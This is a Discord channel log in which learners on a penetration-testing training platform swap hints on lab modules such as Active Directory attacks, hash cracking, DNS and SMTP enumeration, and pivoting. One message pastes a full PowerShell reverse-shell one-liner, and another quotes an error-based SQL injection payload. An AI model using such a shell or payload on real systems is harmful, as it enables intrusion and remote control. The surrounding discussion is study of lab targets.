#modules

1 messages · Page 135 of 1

final maple
#

with json files inside...I tried copying and pasting the json files individually, but bloodhound put up errors when I tried

fiery berry
#

since I never had the issue to trasfer any file from the pwnbox to my local machine, does the pwnbox go over the intenet? Can use any hosting file transfer?

final maple
#

I tried wetransfer and another site like that, but the zip file I get is about .2 MB smaller and bloodhound rejects it

fiery berry
final maple
#

This is what I get in bloodhound

autumn pilot
#

The naming convention hasn't been changed, however, the different versions of bloodhound and sharphound can affect this

final maple
autumn pilot
#

As long as the versions "match" there wouldn't be an issue

final maple
slate gate
#

anyone having issues with the xss module? im trying to connect to the phishing targets but i only see them down

#

nvm got up right after this post

#

dead

#

back down ffs

naive wadi
#

Can someone help with a hint for the question "Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain. " in Active Directory Lab 2. I know I have to use ||DomainPasswordSpray|| but I only have 1 password ||w****|| and the tool just gives me a hit on my already known user ||A****|| I have enumerated for other passwords and have dumped the ||SQL service hash|| just can't crack it. Is there another cred I was supposed to find? Been stuck for 3 days now....

hallow kiln
naive wadi
slow dirge
#

Could you explain it to me?

hallow kiln
naive wadi
#

ahhhh I get you, now .

#

Thanks

lusty thicket
slow dirge
slow dirge
lusty thicket
slow dirge
lusty thicket
#

or something like that (assuming it’s a linux machine)

slow dirge
#

it's windows cmd

lusty thicket
#

and then look for the flag

slow dirge
slow dirge
lusty thicket
#

what type of shell do you have?

#

power shell?

slow dirge
slow dirge
brisk viper
#

Do you guys also download the cheatsheets from the modules and get an Defender error?

I have the problem, that my Windows Defender marks them as Thread:

"Backdoor:PHP/Remoteshell.F"

Is this because defender reads the file content and finds a suspicous line of code?

trail depot
fathom pendant
brisk viper
#

Thanks!

cold cloak
#

Hii, would someone please be able to help me with an academy module?

hallow kiln
#

just ask your question, which module, which section, what have you tried

cold cloak
hallow kiln
#

This is a good hint ^

cold cloak
#

Ahh got it thanks, I messed up and set my filter to only have 4624 events 🙂

mossy hatch
#

Module : Attacking Common Services
Section : Attacking SQL Databases
Question : What is the password for the "mssqlsvc" user?

can someone help me with hashcat, i found the hash of 'mssqlsvc' with responder and used hashcat but it gives me a wrong password
hashcat -m 5600 -a 0 test.hash /usr/share/wordlists/rockyou.txt

sly dome
#

with john i cracked it instantly

mossy hatch
#

yeah i just did it and found it

#

yes its that pass

sly dome
#

i can’t make hashcat works most of the time idk

mossy hatch
#

me too its so annoying

sly dome
#

need a cracking rig 🤣

hallow kiln
#

never had an issue with hashcat, idk what the problem might be

mossy hatch
hallow kiln
#

you can just use hashcat on your host

cursive glacier
#

Ya do everything except hash cracking from VM, i run a 4080 natively and smash through wordlists w hashcat

sly dome
#

do you need cuda toolkit?

#

i have a 3070Ti

#

but for everything i have done in this field i have never needed hashcat tho in the next modules you use it

hallow kiln
#

honestly, I don't bother running it on my host for CTFs, since it's meant to crack quickly by design, but if you get any issues, that's a good way to avoid them

sly dome
#

also do you build from source?

cursive glacier
#

There’s pre-built binaries

sly dome
#

ikik

#

i think also getting from github code can lead to some errors since its a development branch

#

does it work out of the box in Windows apart from installing CUDA toolkit?

cursive glacier
#

Yeah

sly dome
#

nice then

#

thx

cursive glacier
#

Bro have you been cracking from a vm?

sly dome
#

i only had to crack for CTFs and HTB boxes

cursive glacier
#

Dude haha, download hashcat rn and start using it. With a 3070ti the difference is next to none

#

Even for CTFs

sly dome
#

using JtR from my Parrot Vm always has been enough

#

never took more than 30 seconds

#

also i have a 5800x maybe that helps 🤣

#

that thing is hot tho

ashen fog
#
I have a question for the module Advanced SQL Injections in the section Error-Based SQL Injection.

';SELECT%20CAST(CAST(QUERY_TO_XML('SELECT%20*%20FROM%20USERS%20where%20id%20=%2010',TRUE,TRUE,'')%20AS%20TEXT)%20AS%20INT)--%40bluebird.htb
With that statement i get all the info for the user
How do i get the CODE for the reset?
viscid cedar
hallow kiln
viscid cedar
hallow kiln
fiery berry
viscid cedar
rapid kiln
#

Hi Guys I am stuck on "Linux Privilege Escalation - Miscellaneous Techniques", I have root privilege but unable to find flag

#

Can someone please help

vital adder
#

read the #rules keep spamming shit like that and you will get the 👢 up your ass

hallow kiln
viscid cedar
meager token
#

hi i'm doing the crypto challenge secure signing would like to know if it's appropriate to ask if i can dm someone for a hint / if im in the right direction? I have a partial flag and some python code so far. If it's not appropriate thats ok as well 🙂

vital adder
meager token
#

thank you 🙂 haven't verified yet will do now much appreciated

hallow kiln
viscid cedar
autumn pilot
#

no need to overcomplicate things, even the simplest manoeuvre can make an effect

#

no hashes, no dumping and etc is necessary

hallow kiln
#

It was taught earlier in modules when discussing PtH attacks, if you're not doing things in order, Google can help

viscid cedar
mossy hatch
leaden pond
#

Is there someone I can DM about the Enumerating ColdFusion section of the Attacking Common Applications module? This is third day that I have tried loading the target and navigating to port 5500, but I keep getting timeout error messages. I'm hoping someone can help me make progress without having to navigate to <IP>:5500

orchid pine
#

ig

viscid cedar
# orchid pine run the cmd as admin

I ran it from a Command Prompt that had been started with "Run as Administrator:" It says Administrator: Command Prompt at the top.

Is there another way to run the reg add command as admin?

hallow kiln
#

At this point it sounds like there's something wrong with the instance, because as soon as you escalated to local admin, you should be able to access everything

viscid cedar
autumn pilot
#

You are unnecessary overcomplicating things

viscid cedar
autumn pilot
#

since you are modifying the access token of the user a certain action needs to be done that is the most simplest thing that a user can do, whenever his groups/privs have been changed

viscid cedar
viscid cedar
cedar void
autumn pilot
#

target vms are not connected to the internet

cedar void
#

So the exercise doesn't require an internet connection for the target VM machine?

autumn pilot
#

why would it?

viscid cedar
autumn pilot
#

sometimes the most simplest action is the key towards the solution

solar arch
candid lily
#

is there a feature to get machines based on modules i have completed so far

solar arch
#

on the "completed" pages for modules is a list of machines

candid lily
#

i mean machines with modules i have completed so far

#

if i see the ones on completed pages, they require additional modules that i have not completed so its hard

solar arch
#

but i think this requires a ton of classification work - so maybe this is a future feature

candid lily
#

oh okay

#

thanks

mossy hatch
#

Module name : Attacking common Services
Section name : Attacking DNS
Question : Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.

i did a subbrute and found 4 subdomains of inlanefreight.htb but i dont know where to go someone can give me a hint?

hallow kiln
#

what can you do when it comes to DNS?

#

the module tells you

jagged berry
#

Gain a shell on the vulnerable target, then submit the contents of the flag.txt file that can be found in C:\

#

how to do it

#

I have tried for it so many times

hallow kiln
#

which section, which module? we don't automatically know

jagged berry
#

msf can‘t work

mossy hatch
#

do host but it gives nothing

hallow kiln
#

what else

jagged berry
#

SHELLS & PAYLOADS

mossy hatch
#

dns spoofing

#

and takeover

jagged berry
#

Infiltrating Windows

hallow kiln
jagged berry
#

model: SHELLS & PAYLOADS name Infiltrating Windows question : Gain a shell on the vulnerable target, then submit the contents of the flag.txt file that can be found in C:\

mossy hatch
hallow kiln
hallow kiln
mossy hatch
jagged berry
#

I know use msfconsole ,but nothing happen

#

how to do it

mossy hatch
#

and i dont have them

hallow kiln
#

the IP you use in the command is the IP of the machine you spawned

mossy hatch
warm kernel
#

anyone able to give me a hand with install tplmap? I keep running into issues

vital adder
sly dome
#

do not use tplmap xd

vital adder
sly dome
#

you can enumerate SSTI manually 99% of the time

solar arch
cedar void
#

Hi , For the question 'Connect to the target via RDP and establish a reverse shell session with your attack box then submit the hostname of the target box. ' of the Reverse shell section of the 'shells and payloads' module(https://academy.hackthebox.com/module/115/section/1106) , I been executing the command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.210',1337); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535 | ForEach-Object { 0 }; while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); $sendback = (iex $data 2>&1 | Out-String); $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '; $sendbyte = [System.Text.Encoding]::ASCII.GetBytes($sendback2); $stream.Write($sendbyte, 0, $sendbyte.Length); $stream.Flush() }; $client.Close()"' on the Windows target that I RDP'd into.

When I executed the above command, I generated an error. I tried removing extra white spaces found in syntax in the code, using chat gpts suggestion for the error, copying the code into a notepad document before copying it into clipboard and I still generate errors. I am now at a loss on how to resolve this error.

hallow kiln
cedar void
#

nevermind, Itried it

hallow kiln
#

is it working now?

cedar void
#

Yes. strange that that powershell command wouldn't work in the powershell prompts

hallow kiln
#

because the command itself starts powershell

#

if you remove the first part powershell -nop -c along with the quotes surrounding the command, it'll work from powershell

cedar void
#

oh okay

dusky marsh
#

hey guys where can i talk abt htb machines?

#

like i need some help

vital adder
dusky marsh
vital adder
dusky marsh
#

but it's giving me an error

vital adder
#

ping a mod with the error

dusky marsh
#

okay

sand marten
#

Hello folks, anyone managed to finish the File Upload Module ? Stuck in the "Type Filters" section, able to upload file, but no execution.

sly dome
#

am i supposed to get this working in the exercise?

#

or is this just for demonstration?

sand marten
#

would like to finish the module today as well as another one since my exam voucher expires tomorrow.

hallow kiln
#

the majority of the time, windows will block ping, so yes, can you scan it is the question?

sly dome
#

i know it is not working for that particular file because i can read the one needed to pass the section

#

can someone double check?

mossy nest
#

Hey Guyz, i'm currently doing the

Pivoting, Tunneling, and Port Forwarding
RDP and SOCKS Tunneling with SocksOverRDP

But it ask me to upload a dll to my windows machine. When i try to do it by rdp windows tell me that its not possible cause it might be a virus. I tried to zip it and send it, it works but when i extract the zip the dll file is delete after few seconds

barren apex
#

ill grab my notes up

sly dome
#

i did of course

#

as i said i could solve the exercise

#

but is weird because the CDATA method is supposed to show ALL files without exception

#

and yes the /var/www/html/submitDetails.php is the correct path

#

does not work

barren apex
#

what happens if you change it too ./submitdetails.php

sly dome
#

it crashes

barren apex
#

weird

#

should work

#

Can you still read the file if its base 64 encoded?

sly dome
#

haha literally crashed the web server

#

yes i can do it with the base64 method xD

barren apex
#

very weird

sly dome
#

im asking for the CDATA method

barren apex
#

yeah wasnt sure if it was a box issue or CDATA

sly dome
#

it is w.e. maybe the module creator can shed some light

#

or any web expert around here

#

i mean check this, in the module instructions it is indeed working

barren apex
#

what happens if you put the %xee in the email box?

#

actually that wont work will it

sly dome
#

no you have to place the entity defined in the evil.dtd file

barren apex
#

yep misread it

#

not sure then

sly dome
#

i mean i can read php file

#

without problems

barren apex
#

just not that one haha

sly dome
#

has to be some DOS protection

barren apex
#

self reference makes sense

sly dome
#

but i cannot read the passwd for example

#

HAHAHAHA

#

while i can read the hosts

barren apex
#

its working now?

sly dome
#

no

#

is a different route

barren apex
#

ah yah the base64 one

sly dome
#

its the /error page

weak stirrup
#

working on the module for C# and I have a ridiculous question... I cant figure out what the question for the array section as I dont know what is 'exactly' asking for. this is very hard to ask about with out risking a 'spoiler' . The question states How can you access the element in the third row and second column of a two-dimensional array named grid in C#? using the example given above in the Console.Write(matrix[i, j] + " "); I have tried to mimic coding convention in the example with the trailing spacing after the comma and and format shown for the matrix variable. I also tried among trying swapping what I believe to be column and row, removing the trailing space, adding others, etc. I dont know what pattern it is looking for. Maybe the question would be better if it was Write a line of code to set the variable 'foo' equal to the row m and col n of the array bar using code conventions shown above answer foo = bar[m, n];

sly dome
barren apex
#

honestly no idea haha

sly dome
#

+1

#

i wont sleep today i think

#

it seems this is what is happening but this is not documented in the module

#

i think we need an erratum

#

both passwd and submitDetails.php contains weird symbols (?)

sterile epoch
#

Hi, I am currently in the network enumeration with nmap module. I was going through the firewall section I am a bit confused to the DNS proxying part in the example why are they specifically using port 50000?

mossy hatch
#

Module name : ATTACKING WEB APPLICATIONS WITH FFUF
Section : Sub-domain Fuzzing

#

is it only me or the question has changed recently

sterile epoch
#

is that a random port or something calculated?

sly dome
mossy hatch
#

the hint has nothing to do with my answer

#

i did the module a month ago

sly dome
#

my answer is *.inlanefreight.com

mossy hatch
#

not me

sly dome
#

it changed then

mossy hatch
#

its *.hackthebox.eu

#

oh ok

sly dome
#

that domain does not exist anymore i think

#

old and good times

mossy hatch
#

xd ok i thought i was insane for a moment lol

near jackal
#

Looking for help finding tools- I am in the HTB academy fundamentals module Documentation and reporting lab. I've already answered question 1 but it seems based on the documentation I will need to use Rubeus/mimkatz to answer the next couple questions. Can anyone point me in the right direction to find these tools in the lab?

sly dome
#

this is not here i think

#

we dont have access to enterprise

#

contact your local instructor

#

i asked coz we dont even have a "HTB Academy Fundamentals" module

dusky marsh
#

do mods even reply here?

quiet vine
#

Hello! I am new here, and I am just curious, are the HTB certs the best certs or are there more relevant certs to get for pen testing? (No disrespect, I am just not knowledgeable)

#

Or what is a good start to getting into it? (Aside from A+, Sec+, Network+)

hallow kiln
dusky marsh
hallow kiln
#

The CPTS path is useful for CPTS

#

No, anything that's in that path and not in CPTS path is not relevant to the CPTS exam

lost shadow
#

hey i currenlty on Credentials in Object Properties. I create the script as SearchUser.ps1. i ran the script in powershell and nothing happend. what i'm doing wrong, can u assist?

wintry basin
quiet vine
#

Any good resource recommendations for studying?

#

Thanks!

sly dome
#

cool script to exfil data throuhg XXE out of band

quiet vine
analog dock
#

<@&861185840277487616> check his bio

jolly cradle
#

Ty @analog dock

analog dock
#

You’re welcome

nova ocean
#

hi guys i am stuck in footprinting dns last question can anybody help please?? What is the FQDN of the host where the last octet ends with "x.x.x.203"?

nova ocean
#

please dm

analog dock
nova ocean
#

i am stuck there for 4 hours

fathom pendant
#

I gave you a hint here

nova ocean
#

ok so a subdomain of inlanefreight.htb

fathom pendant
#

There's really not much else to nudge for

nova ocean
#

of subdomain double it

#

ok thank u i will check that

fathom pendant
#

Your answer will be a.b.inlanefreight.htb

nova ocean
#

sometimes the answer is infront of us and we dont see it

nova ocean
fathom pendant
#

As stated in the hint that's given to you by the module: wordlists often have different words

#

So start small go bigger when trying different wordlists

nova ocean
#

i tried top 5000 and fierce

lusty thicket
nova ocean
#

didnt show me the result i need

lusty thicket
fathom pendant
#

^

lusty thicket
#

😉

fathom pendant
#

If you're not finding the answer maybe try something different

#

You'll need to use dnsenum on the subdomain.inlanefreight.htb

nova ocean
thorn urchin
#

no you didnt

#

or youd have had the answer

fathom pendant
#

^

nova ocean
#

didnt find .203

#

i found .201

fathom pendant
#

What does your command look like

lusty thicket
nova ocean
#

tried also ns.inlanefreight.htb

#

and others

#

wordlist110000

#

5000

fathom pendant
#

Fierce is correct

nova ocean
#

the domain?

fathom pendant
#

You must have skipped over a subdomain

nova ocean
#

internal.inlane

fathom pendant
#

You're missing one

nova ocean
#

app

fathom pendant
#

Your messages are being deleted as they contain spoilers btw

#

By a mod, not me

#

Unless you did

nova ocean
#

no not me

fathom pendant
#

I'm not telling you which one you're missing in your list. Do a simple zone transfer to inlanefreight.htb

nova ocean
#

i had found like 8

#

so i need to dig axfr inlane

fathom pendant
#

And see if you're missing a subdomain you haven't used dnsenum on

lusty thicket
autumn pilot
#

there is a helpful graphic in the section of the module

#

take the time to understand it

nova ocean
#

i checked dev i checked many

#

i will check the graph thanks

#

i already checked ws01

thorn urchin
#

Its not about checking many

#

check all of them

nova ocean
#

found it

thorn urchin
#

ALL

tight mesa
#

hello every one, anyone who knows about ligolo-ng?, to ask some related to pivot module

thorn urchin
#

congrats

nova ocean
#

thank u

nova ocean
#

was tricky because i did run this command but it make error so i cancel this time after i read the graph i left it to see and it run i saw 1st host and i left it more

tight mesa
#

LoL @thorn urchin ok., here we go.....

fathom pendant
thorn urchin
#

the ligolo-ng fans grows daily

fathom pendant
#

It's not a cult, trust

tight mesa
#

my double pivot is established, BUT can't ping to what I think is DC01 (172.16.6.25)

nova ocean
#

the information is amazing all have to be noted

tight mesa
fathom pendant
nova ocean
fathom pendant
#

Don't

#

Lol I already know

nova ocean
#

oh god i know it

#

i done zephyr i face all of them

fathom pendant
#

You're basically forced to wait for the tools because you're given a custom wordlist to mutate and run against the targets

nova ocean
#

almost

thorn urchin
# tight mesa

why did you start the first session, switch to a second session, then switch back?

#

you have to be on the session that has access the subnet you want to target

#

also dont forget to add the new route for the new subnet

tight mesa
#

that route is already added...

thorn urchin
#

why you ... me

nova ocean
#

to start from bottom

thorn urchin
#

I gave two big pointers for why it could be not working

#

if you insist one of the two big points are fine, then address the other one

fathom pendant
thorn urchin
#

both the route and the correctly selected session need to be active at the same time

tidal kelp
#

Currently on the Password attacks\PtT . I've found the hash for the workstations but having some trouble cracking it. Any that can point my in the right direction. Have tried both Hashcat and John without luck

thorn urchin
#

also do you KNOW that the DC is on the IP or just guessing? And have you interacted besides just ping? because most windows machines ignore ping

fathom pendant
fathom pendant
tidal kelp
#

linux

nova ocean
tidal kelp
#

have tried both rock you and the mutated one pased on the resources in the exercices

tight mesa
tidal kelp
#

b

fathom pendant
thorn urchin
tidal kelp
fathom pendant
tidal kelp
#

yeah that didnt work

thorn urchin
# tight mesa

hmm okay.

try just doing a crackmapexec smb 172.16.6.0/24 sweep

fathom pendant
#

Then you can Google hashcat modes I forget the flag in hashcat to use

sterile epoch
#

Hi, I am currently in the network enumeration with nmap module. I was going through the firewall section I am a bit confused to the DNS proxying part in the example why are they specifically using port 50000? I tried running the command
nmap -v -sV -p- -Pn -n --disable-arp-ping --source-port 53 -oX freshTCP.xml 10.129.2.47 but the scan takes more than 5 hours and by the time it finishes the machine expires. Please help I am stuck in the last ips hard box.

thick belfry
#

Hi , anyone here is solved sau machine ?

tight mesa
thorn urchin
tight mesa
#

now I can reach 172.16.6.25

thorn urchin
#

dope

fathom pendant
#

That's literally the only difference

#

If you take out the given port

sterile epoch
#

I tried that and sA but when I am trying on all the ports it takes an absurdly long time

tight mesa
sterile epoch
#

I did almost all of them

thorn urchin
tight mesa
fathom pendant
sterile epoch
#

tried without it too

#

the problem is when I do -p- it takes an absurdly long time like 7 to 8 hrs

#

and I do not get any result

#

even when I try T 5

#

at which point I get blacklisted

#

I have a good internet conn too

#

the problem is not only with the last box but all the boxes in that module

lusty thicket
tidal kelp
#

Used the one referred to in the script... can now see there are one more

#

facepalm

sterile epoch
nova ocean
#

Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

#

any metasploit or wordlist to use?

fathom pendant
sterile epoch
#

I use the eu vpn cuz i am from india

#

should I try switching to different zones?

fathom pendant
#

Local, as in your own internet

sterile epoch
#

I get around 100Mbps here

fathom pendant
#

That's honestly not a whole lot. But it could be that the packets are being filtered by your isp. But don't really know, the vpn region shouldnt be the issue

lusty thicket
sterile epoch
#

any idea how can I speed it up?

fathom pendant
#

Well if it's your isp, not much you can do there

#

Are you using a vm?

sterile epoch
#

yes what if i use the pwnbox?

lusty thicket
fathom pendant
#

Stop your vpn connection on your vm and test in pwnbox

sterile epoch
#

ok I will do that thanks for the help guys

tight mesa
#

pivot skill assessment is pretty unstable or I'm the only one who is suffering with it...!!!

nova ocean
#

nmap 10.129.79.194 -p25 --script=smtp*

#

none of them worked found 10 and used them didnt work

#

same as nmap 10.129.79.194 -p25 --script=/usr/share/nmap/scripts/smtp-enum-users.nse

nova ocean
#

enum username

#

Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

fathom pendant
#

Eh

sterile epoch
#

it worked thanks again @fathom pendant @lusty thicket

fathom pendant
#

smtp-user-enum script I find is better to use to not have to use Metasploit tbh

sterile epoch
#

any idea how do I import the scan files from pwnbox to my vm?

#

cuz if I use http server on pwnbox I cannot use the vpn from my vm

lusty thicket
pulsar hazel
#

Need some help from the community, particualry those who are good at assembly code! I'm stuck on the Intro to Assembly language module, I find the module to be extremally complex, and the language quite hard to understand. And I'm only halfway so will likely return here for help....

Currently, I need to modify this code (mov rax, 5) so that it will not loop. I then need to find the hex value that prevents the loop. Here is the code I am to edit:

global _start

section .text
_start:
mov rax, 5 ; change here
imul rax, 5
loop:
cmp rax, 10
jnz loop

nova ocean
fathom pendant
#

Yeah and Metasploit is often a crutch tbh. I honestly avoid msfconsole unless told to use it

sterile epoch
#

I am going sequence manner in the cpts path I will look into the module once i get there

#

Thanks for the suggestion

lusty thicket
nova ocean
#

employee name

lusty thicket
nova ocean
#

On systems usernames are often named after the employee's name. We recommend to use the Footprinting-wordlist provided as resource. Remember that some SMTP servers have higher response times.

lusty thicket
#

the part about smtp servers having different response times

nova ocean
#

mmm

lusty thicket
#

play with the timing a bit

nova ocean
#

min rate

lusty thicket
nova ocean
#

how

lusty thicket
#

the smtp-user-enum tool works for me

nova ocean
#

it worked and gave me users

fathom pendant
#

Well with the smtp-user-enum tool doing like -W 15 seems to be the sweet spot

nova ocean
#

gave me 10 users

lusty thicket
nova ocean
#

| root
| admin
| administrator
| webadmin
| sysadmin
| netadmin
| guest
| user
| web
|_ test

nova ocean
#

nmap 10.129.79.194 --script=smtp-enum-users -p25

fathom pendant
#

Eh

#

You can use the script as a standalone

lusty thicket
fathom pendant
#

Not in nmap

lusty thicket
fathom pendant
#

Because in Nmap iirc you have to mess with the --script-args={option1,option2,option3,option4}

tiny reef
#

"Broken Authentication" -> "Predictable reset token" I have done most necessary steps to generate tokens but I think my timestamp is messed up. I don´t want to spoiler others so possibly anybody able to help me could DM 🙂

fathom pendant
#

Which is far more painful (doable)

fathom pendant
nova ocean
#

i didnt see

lusty thicket
fathom pendant
#

Read the advice we're giving you

#

Use the smtp-user-enum as it's own command/tool

nova ocean
#

bloody hell

#

now i saw the wordlist

elfin cedar
#

hi. Can someone help me with a hint for Session Hijacking? I am not getting any cookies or cookies.txt. Am I supposed to put my vpn IPaddress in the index.php? I have tried the target's IP and mine so idk what I am doing wrong.

nova ocean
#

i didnt know that we can use from there

fathom pendant
nova ocean
tiny reef
#

i have to convert time? bruuuuh

fathom pendant
fathom pendant
nova ocean
#

ah ok

fathom pendant
#

Like you can get lucky with it

viral ridge
#

getting started module, Nibbles Web FootPrinting

Now we are starting to get a better picture of things. We can see some of the technologies in use such as HTML5, jQuery, and PHP. We can also see that the site is running Nibbleblog, which is a free blogging engine built using PHP.

http://10.10.10.75/nibbleblog [301 Moved Permanently] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.10.75], RedirectLocation[http://10.10.10.75/nibbleblog/], Title[301 Moved Permanently]
http://10.10.10.75/nibbleblog/ [200 OK] Apache[2.4.18], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.10.75], JQuery, MetaGenerator[Nibbleblog], PoweredBy[Nibbleblog], Script, Title[Nibbles - Yum yum]

am i blind? where is the php ?

#

oh i get it..

#

phpsessid

nova ocean
fathom pendant
#

Well yes but iirc if you do like -a3 or one of the other flags shown it should give you a broader picture

nova ocean
#

O.o 0 results

tiny reef
#

@fathom pendant Thanks, got the flag now. Also such a useful tip with the past message search, will do that more often before asking here.. Finally I can go to the gym, I thought I would spend the whole evening here xD

fathom pendant
#

Don't recall

lusty thicket
nova ocean
#

what is EXPN?

fathom pendant
#

Not needed

nova ocean
lusty thicket
#

yes

#

spoiler btw

fathom pendant
#

It can also depend

#

Some can be set up as blackholes that accept any email/domain and return a positive status

nova ocean
#

i didnt see the spoil ;p

fathom pendant
#

Like "yes your email did happen, but really it didn't"

fathom pendant
#

Oh you're being cheeky

nova ocean
#

Examples:

$ smtp-user-enum -M VRFY -U users.txt -t 10.0.0.1
$ smtp-user-enum -M EXPN -u admin1 -t 10.0.0.1
$ smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt
$ smtp-user-enum -M EXPN -D example.com -U users.txt -t 10.0.0.1

#

i used first one

fathom pendant
#

deep breath

#

Honestly how tf did you get hacker rank if you don't know the basics

lusty thicket
nova ocean
#

finally

nova ocean
#

i used metasploit

fathom pendant
#

Commands aren't always instant, we're forcing it to wait a certain time between attempts

nova ocean
#

provide the wordlist there

#

and run it

fathom pendant
#

Metasploit is a crutch tbh

lusty thicket
nova ocean
#

i will try it again

lusty thicket
fathom pendant
#

You may need to mess with the -W timing

#

What's the -d for?

nova ocean
#

debug

lusty thicket
fathom pendant
#

You don't need that flag there

nova ocean
#

ok trying without

#

0 result

#

try timing 30?

lusty thicket
#

try timing 10

hallow kiln
#

honestly I never got smtp-user-enum to work in that section, would be curious to know what would make it work

nova ocean
#

i tried 15 i tried 10 i tried 30

#

i tried 5

#

crutch better than nothing

#

😄

autumn pilot
#

Taking breaks usually helps to enhance your understanding and concentration about a problem

#

Rushing through sections or exercises is something that do not recommend doing

#

This is not a sprint, you won't get bonus points for faster solves and etc

nova ocean
#

probably

lusty thicket
nova ocean
nova ocean
hallow kiln
#

works after reboot?

nova ocean
#

syntax is fine i checked cheatsheets and some articles

#

i changed command many times and nothing worked

fathom pendant
#

The timeout flag is lowercase w

#

Lol

hallow kiln
#

everything you need is in the section on SQL databases, have you tried everything?

#

great

nova ocean
nova ocean
#

i keep trying and reseting lab

#

and removed -p 25 and -v

#

i use only target and -w 15

elfin cedar
#

I've tried everything I can think of. I've used different ports, used a different name for the file instead of script.js, reset the target multiple times. The index.php isn't getting called. Does anyone know why? I'm in Session Hijacking

#

I've read through the hackthebox forums, previous discord messages, and googling

hallow kiln
#

did you add it to /etc/hosts

#

yeah, hopefully that fixes it, 'm pretty sure you could access both http and https

balmy pelican
#

I'm kind of confused about the second question in the footprinting module about mssql because i believe i have listed the non-default database and I assume that I should see some kind of a flag but don't. Any help?

deep lynx
#

I'm not kidding whatsoever.

balmy pelican
tame ivy
#

Module name : Getting Started
Section name : Privilige Escalation
with sudo -l got a user2, but cannot get a root, tried upload with http.server a linpeas,sh but looks like there is firewall, how to do it??? please help!!

hallow kiln
#

contact a company that provides those services

deep lynx
thorn urchin
hallow kiln
#

yeah, good luck with that

deep lynx
#

There is no more time to waste.

thorn urchin
#

discord isnt a great place to hire lmao

deep lynx
hallow kiln
#

something concerning a government totally calls for going to a random server for a learning platform

deep lynx
deep lynx
#

Ok, and? I have no reason to hide. I have done nothing wrong and am a completely free man.

deep lynx
thorn urchin
deep lynx
#

I've probably already done it in fact. 🥱

thorn urchin
#

youre offtopic too

elfin cedar
#

lol "shrimply"

deep lynx
#

She was mid asf.

thorn urchin
deep lynx
hallow kiln
#

Nope, there are legit channels to go through, this isn't one of them.

fathom pendant
#

Just go fuck off if you can't comprehend basic rules

autumn pilot
#

keep the channel on topic, seems like that person watched to much CSI: Miami let him be

tame ivy
#

Module name : Getting Started
Section name : Privilige Escalation
with sudo -l got a user2, but cannot get a root, tried upload with http.server a linpeas,sh but looks like there is firewall, how to do it??? please help!!
maybe someone will help and not argue in this topic lol??

balmy pelican
#

hey guys is there a reason i can't post my screenshots here?

balmy pelican
thorn urchin
fathom pendant
balmy pelican
autumn pilot
#

for X amount of time he won't be able to send messages 😉

tame ivy
hallow kiln
#

you don't need linpeas

fathom pendant
#

Just look around

tame ivy
#

well ok thanks guys ❤️

thorn urchin
autumn pilot
#

unless discord somehow messes it up

elfin cedar
#

sheesh, I passed the Skills Assessment put cant get the session hijacking section to work

fathom pendant
fathom pendant
lusty thicket
tame ivy
#

did i done something wrong?

elfin cedar
#

I usedport 3333

tame ivy
#

ssh root@94.237.53.115 -i key

tame ivy
#

oh well thank you very much ❤️ it worked

sly dome
#

boi what happened above

slate gate
#

Pls fix the xss module FeelsBadMan

sly dome
#

skill issue

finite nest
#

Guys do you rather learn by "Starting Machines" on htb and then move to academy

#

or academy htb -> Starting machines

#

Cuz those starting machines are also with Guides

lost shadow
orchid pine
#

hello guys in ad enumeration module Kerberoasting - from Linux i have thiss question What powerful local group on the Domain Controller is the SAPService user a member of?

#

i have the password and a user and i can authenticate to the smb dc

#

how can i know which group im memeber of

thorn urchin
orchid pine
#

can i do thats using crackmap

#

never mid

#

i was forgetting the s

fading oracle
#

Hi!

#

i am Doing the living off land module in AD. Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer. i have problem with this question. I managed to list all the disabled users but no flag

#

can someone give me a sanity check?

#

my syntax were

orchid pine
#

i just did it

#

btw

#

can u send the cmnd u used

fading oracle
#

yes

#

Import-Module ActiveDirectory

orchid pine
#

i used dsquery

thorn urchin
#

I wouldnt use the object category or object class personally

#

id have to double check if the ldap rights there is correct though

orchid pine
#

u didnt add the flag for the admin rights no ?

#

and u didnt add description

thorn urchin
#

that too, thatd give you a list of users, youd then need to parse their description

#

unless you were using ldapsearch instead

orchid pine
#

and the question was like he need to have admin rights so i added (adminCount=1)

fading oracle
#

i did this

#

it shows just the beginning of the flag

fading oracle
#

it worked

#

with this

nova wharf
#

hey guest quick question I'm working on the nmap room and doing a vuln scan on the host do I just pick one of the vulns or should I use searchsploit on the apache server version

covert sierra
#

I thought it just me 😦

elfin cedar
#

has anybody had this problem? I rebooted and still not able to click the link. It just started happening out of the blue. I even spawned/clicked the link from windows to copy over the IP address but it just hangs anyway.

wintry basin
ancient shore
#

Just completed my first hack. Pretty cool. I like it.

lost shadow
#

hey did you solve this ? i think that i'm loosing my mind. I filtered by 4771 checked all the targetsid and nothing works

lost shadow
nova wharf
#

it wants me to find the vulnerable service using the scripts I checked the hint and it said web server so I figure the apache server on port 80 and it gave me a huge print out do I need to just choose one of those vulns.

elfin cedar
novel matrix
elfin cedar
#

it works now

novel matrix
#

Sweet. Good to hear

fathom pendant
foggy light
#

Me going through all of Vautia's Modules
Contents are insane and crazy challenging. Thanks you (someone mention him if he is on discord)

lost shadow
polar rain
#

how do i paste a screenshot here?

lusty thicket
polar rain
#

thanks

#

ok so im in HyperText Transfer Protocol (HTTP) module in the very first question and the flag is in this file '/download.php' , the target is Target: 94.237.49.11:30792 so the command looks like:

#

but as you can see in my ls the /download.php file is not there, what am I doing wrong?

lusty thicket
polar rain
#

ok, let me try

#

i did it like that due to the cheatsheet:

fathom pendant
#

Just do wget

polar rain
#

how do i know when to use the resources given in the lecture and when to not? i mean i asume when it doesn't works right? but how a begginer like me should know about these commands, like wget is not even listed in the lecture

